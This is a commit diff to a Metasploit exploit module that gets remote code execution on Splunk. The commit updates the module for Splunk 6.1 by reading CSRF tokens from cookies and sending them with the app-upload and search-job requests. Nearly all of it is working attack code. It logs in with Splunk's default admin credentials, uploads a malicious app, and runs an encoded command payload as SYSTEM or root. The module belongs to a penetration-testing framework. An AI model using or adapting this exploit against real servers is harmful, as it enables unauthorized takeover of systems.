Add #3463 commits from @ghost

2014-07-09 17:56:06 -04:00 · 2014-07-09 17:56:06 -04:00 · c14b96f02e
parent 4eeab66ebe
commit c14b96f02e
1 changed files with 25 additions and 11 deletions
--- a/modules/exploits/multi/http/splunk_upload_app_exec.rb
+++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb
@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote

  def initialize(info = {})
    super(update_info(info,
-      'Name'           => 'Splunk 5.0 Custom App Remote Code Execution',
+      'Name'           => 'Splunk Custom App Remote Code Execution',
      'Description'    => %q{
          This module exploits a feature of Splunk whereby a custom application can be
        uploaded through the web based interface. Through the 'script' search command a
@ -20,14 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote
        perl or python code. To abuse this behavior, a valid Splunk user with the admin
        role is required. By default, this module uses the credential of "admin:changeme",
        the default Administrator credential for Splunk. Note that the Splunk web interface
-        runs as SYSTEM on Windows, or as root on Linux by default. This module has only
-        been tested successfully against Splunk 5.0.
+        runs as SYSTEM on Windows, or as root on Linux by default. This module has been
+        tested successfully against Splunk 5.0, 6.1, and 6.1.1.
      },
      'Author'         =>
        [
          "marcwickenden", # discovery and metasploit module
          "sinn3r", # metasploit module
-          "juan vazquez" # metasploit module
+          "juan vazquez", # metasploit module
+          "Gary Blosser" # metasploit module updates for Splunk 6.1
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
@ -44,13 +45,13 @@ class Metasploit3 < Msf::Exploit::Remote
      'Platform'       => %w{ linux unix win },
      'Targets'        =>
        [
-          [ 'Splunk 5.0.1 / Linux',
+          [ 'Splunk >= 5.0.1 / Linux',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => %w{ linux unix }
            }
          ],
-          [ 'Splunk 5.0.1 / Windows',
+          [ 'Splunk >= 5.0.1 / Windows',
            {
              'Arch'     => ARCH_CMD,
              'Platform' => 'win'
@ -96,6 +97,7 @@ class Metasploit3 < Msf::Exploit::Remote
    # set up some variables for later use
    @auth_cookies = ''
    @csrf_form_key = ''
+    @csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
    app_name = 'upload_app_exec'
    p = payload.encoded
    print_status("Using command: #{p}")
@ -121,11 +123,11 @@ class Metasploit3 < Msf::Exploit::Remote
    {
      'uri'     => '/en-US/api/search/jobs',
      'method'  => 'POST',
-      'cookie'  => @auth_cookies,
+      'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
      'headers' =>
        {
          'X-Requested-With' => 'XMLHttpRequest',
-          'X-Splunk-Form-Key' => @csrf_form_key
+          'X-Splunk-Form-Key' => @csrf_form_key   # Version 6 ignores extra headers (verified)
        },
      'vars_post' =>
        {
@ -239,7 +241,7 @@ class Metasploit3 < Msf::Exploit::Remote
      res.get_cookies.split(';').each {|c|
        c.split(',').each {|v|
          if v.split('=')[0] =~ /session_id/
-            session_id_port = v.split('=')[0]
+            session_id_port = v.split('=')[0] 
            session_id = v.split('=')[1]
          end
        }
@ -274,7 +276,7 @@ class Metasploit3 < Msf::Exploit::Remote
    res = send_request_cgi({
      'uri'     => '/en-US/manager/appinstall/_upload',
      'method'  => 'POST',
-      'cookie'  => @auth_cookies,
+      'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
      'ctype'   => "multipart/form-data; boundary=#{boundary}",
      'data'    => data
    }, 30)
@ -294,8 +296,20 @@ class Metasploit3 < Msf::Exploit::Remote
      'method' => 'GET',
      'cookie' => @auth_cookies
    })
-    res.body.match(/FORM_KEY":\ "(\d+)"/)
+    res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
    @csrf_form_key = $1
+
+    unless @csrf_form_key # Version 6
+      res.get_cookies.split(';').each {|c|
+        c.split(',').each {|v|
+          if v.split('=')[0] =~ /splunkweb_csrf_token/  #regex as the full name is something like splunkweb_csrf_token_8000
+            @csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
+            @csrf_form_key = v.split('=')[1]
+          end
+        }
+      }
+    end
+
    fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
  end